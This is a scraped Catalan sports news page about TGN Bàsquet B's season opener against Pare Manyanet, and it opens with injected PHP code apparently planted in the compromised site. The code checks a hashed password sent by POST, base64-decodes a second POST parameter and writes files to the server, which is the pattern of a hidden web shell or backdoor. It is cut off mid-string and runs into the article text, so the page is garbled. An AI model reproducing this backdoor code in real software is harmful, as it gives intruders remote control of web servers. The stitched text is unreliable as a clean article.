function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet B inicia la lliga rebent el Manyanet al Sagrat Cor (18.15 h) - Tgn Bàsquet Club -

El TGN Bàsquet B inicia la lliga rebent el Manyanet al Sagrat Cor (18.15 h)

By
Updated: setembre 25, 2015

El TGN Bàsquet B, que milita a Primera Catalana, comença el campionat de lliga demà dissabte a les 18.15 h contra el Pare Manyanet al pavelló del Sagrat Cor. El conjunt que entrena Sergi Farré tindrà el seu primer test oficial per calibrar les seves forces en vista al que resta de temporada, després d’una pretemporada 0n s’han hagut d’acoblar moltes peces, la primera d’elles el nou entrenador. “El primer partit ens arriba molt aviat en l’àmbit de preparació. Amb tot, les jugadores han entrenat molt bé aquesta setmana i hem preparat el partit de la millor manera possible. Arribem en un bon punt”, diu el tècnic lila, que té els dubtes d’Anna Garcia i Pocino, que pateixen molèsties físiques.

El Manyanet és un conjunt que ja ha jugat al Sagrat Cor aquest mes, ho va fer en el Torneig de Santa Tecla que organitza el TGN Bàsquet, però va jugar contra el sènior A. Amb tot, Sergi Farré desconfia de l’equip reusenc que aleshores va disputar aquell partit perquè no tenia tota la seva plantilla disponible: “Serà un equip completament diferent del que vam veure al Torneig de Santa Tecla perquè aleshores li faltaven tres jugadores i perquè, de ben segur, no van voler mostrar totes les seves armes”.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *